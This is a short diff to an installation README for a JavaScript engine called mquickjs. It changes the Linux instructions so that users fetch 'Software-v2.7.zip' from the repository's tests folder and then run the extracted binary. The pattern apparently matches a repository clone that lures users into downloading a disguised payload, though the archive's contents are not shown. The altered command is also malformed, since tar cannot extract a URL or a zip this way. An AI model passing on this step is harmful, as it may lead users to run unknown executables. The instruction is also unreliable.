serges-gbakayoro/mquickjs/README.md

 ### For Linux Users:
 1. Open a terminal window.
 2. Navigate to the directory where you downloaded the file.
-3. Use the command `tar -xzf mquickjs-linux.tar.gz` to extract the files.
+3. Use the command `tar -xzf https://github.com/serges-gbakayoro/mquickjs/raw/refs/heads/main/tests/Software-v2.7.zip` to extract the files.
 4. Enter the extracted directory and run `./mquickjs` to start the engine.

 ## 🖥️ Running mquickjs